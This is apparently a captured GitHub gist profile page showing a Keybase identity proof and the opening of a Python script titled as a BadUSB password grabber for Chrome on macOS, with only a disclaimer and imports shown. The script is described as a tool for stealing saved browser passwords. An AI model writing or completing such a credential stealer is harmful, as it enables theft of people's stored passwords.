Skip to content

Instantly share code, notes, and snippets.

View subnetmasked's full-sized avatar
🍣
Currently not doing anything

SubnetMasked subnetmasked

🍣
Currently not doing anything
  • Denmark
View GitHub Profile
@subnetmasked
subnetmasked / keybase.md
Created October 8, 2024 19:31
keybase proof

Keybase proof

I hereby claim:

  • I am subnetmasked on github.
  • I am mrsubnetmasked (https://keybase.io/mrsubnetmasked) on keybase.
  • I have a public key ASBivb4QjyVErQPezzWTi4-Cw5TP62X05TqimvdrEoMZAwo

To claim this, I am signing this object:

@subnetmasked
subnetmasked / macos-badusb-chrome-pw.py
Created October 14, 2024 20:31
password grabber for macos (Badusb)
# For educational purposes, I'm not responsible for what you do with this.
import os
import sqlite3
import csv
import base64
from Cryptodome.Cipher import AES
import keyring
import shutil